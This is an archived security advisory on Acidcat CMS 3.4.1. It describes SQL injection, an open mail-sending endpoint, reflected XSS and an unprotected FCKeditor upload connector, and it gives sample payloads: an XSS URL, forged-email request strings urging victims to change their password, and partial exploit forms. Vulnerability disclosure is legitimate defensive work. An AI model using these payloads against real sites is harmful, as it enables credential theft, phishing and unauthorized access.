TUCoPS :: Web :: CMS / Portals :: bx2882.htm

Acidcat CMS Multiple Vulnerabilities
Acidcat CMS Multiple Vulnerabilities
Acidcat CMS Multiple Vulnerabilities


########################## www.BugReport.ir #######################################=0D 
#=0D
#      AmnPardaz Security Research Team=0D
#=0D
# Title: Acidcat CMS Multiple Vulnerabilities. =0D
# Vendor: www.acidcat.com=0D 
# Vulnerable Version: 3.4.1=0D
# Exploit: Available=0D
# Impact: High=0D
# Fix: N/A=0D
# Original Advisory: http://bugreport.ir/index.php?/36=0D 
###################################################################################=0D
=0D
=0D
####################=0D
1. Description:=0D
####################=0D
Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.=0D
=0D
####################=0D
2. Vulnerability:=0D
####################=0D
	2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.=0D
		2.1.1. POC:=0D
				Check the exploit section.=0D
	2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.=0D
		2.2.1. POC:=0D
				Check the exploit section.=0D
	2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.=0D
		2.3.1. POC:=0D
				Check the exploit section.=0D
	2.4. There is a XSS in "/admin/admin_colors_swatch.asp".=0D
		2.4.1. POC:=0D
				/admin/admin_colors_swatch.asp?field=value='';}alert('XSS');function(){myForm.myText=0D
	2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.=0D
		2.5.1. POC:=0D
				/admin/fckeditor/editor/filemanager/connectors/test.html=0D
####################=0D
3. Exploits:=0D
####################=0D
 =0D
Original Exploit URL: http://bugreport.ir/index.php?/36/exploit=0D 
=0D
	3.1. Attacker can gain usernames and passwords:=0D
	-------------=0D

action="http://[The URL]/default.asp?formType=&itemID=" method="post">=0D 
		=0D
		
=0D
		=0D
		
=0D
=0D
	-------------=0D
	3.2. Attacker can send email without any permission:=0D
 	-------------=0D
default_mail_aspemail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D 
									=0D
default_mail_cdosys.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D 
		=0D
default_mail_jmail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D 
	-------------=0D
	3.3. Attacker can login to the site:=0D
	-------------=0D
		
=0D
		=0D
		
=0D
		=0D
		
=0D
		=0D
		
=0D
	-------------=0D
####################=0D
4. Solution:=0D
####################=0D
	Edit the source code to ensure that inputs are properly sanitized.=0D
####################=0D
- Credit :=0D
####################=0D
AmnPardaz Security Research & Penetration Testing Group=0D
Contact: admin[4t}bugreport{d0t]ir=0D
WwW.BugReport.ir=0D 
WwW.AmnPardaz.com=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH